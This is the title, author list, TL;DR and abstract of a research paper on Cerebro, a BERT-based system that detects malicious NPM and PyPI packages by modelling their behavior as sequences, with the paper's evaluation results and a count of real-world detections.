Killing Two Birds with One Stone: Malicious Package Detection in NPM and PyPI using a Single Model of Malicious Behavior Sequence
Junan Zhang, Kaifeng Huang, Yiheng Huang, Bihuan Chen, Ruisi Wang, Chong Wang, Xin Peng
TL;DR
This work tackles malicious package attacks in the NPM and PyPI ecosystems by introducing Cerebro, a unified framework that fuses cross-ecosystem knowledge and models malicious behavior as sequences. It combines a static feature extractor, a behavior sequence generator that preserves execution order, and a transformer-based classifier that is fine-tuned on bilingual data. Across a dataset of 2,675 malicious and 7,391 benign packages, Cerebro delivers higher precision and recall than state-of-the-art baselines while maintaining practical inference times, and demonstrates real-world utility through multi-month monitoring that yielded hundreds of true malicious detections. The approach highlights the value of cross-language semantic understanding and sequential modeling for OSS supply chain defense, with opportunities to broaden language support, improve false-positive handling, and extend deployment to additional ecosystems.
Abstract
Open-source software (OSS) supply chain enlarges the attack surface, which makes package registries attractive targets for attacks. Recently, package registries NPM and PyPI have been flooded with malicious packages. The effectiveness of existing malicious NPM and PyPI package detection approaches is hindered by two challenges. The first challenge is how to leverage the knowledge of malicious packages from different ecosystems in a unified way such that multi-lingual malicious package detection can be feasible. The second challenge is how to model malicious behavior in a sequential way such that maliciousness can be precisely captured. To address the two challenges, we propose and implement Cerebro to detect malicious packages in NPM and PyPI. We curate a feature set based on a high-level abstraction of malicious behavior to enable multi-lingual knowledge fusing. We organize extracted features into a behavior sequence to model sequential malicious behavior. We fine-tune the BERT model to understand the semantics of malicious behavior. Extensive evaluation has demonstrated the effectiveness of Cerebro over the state-of-the-art as well as the practically acceptable efficiency. Cerebro has successfully detected 306 and 196 new malicious packages in PyPI and NPM, and received 385 thank letters from the official PyPI and NPM teams.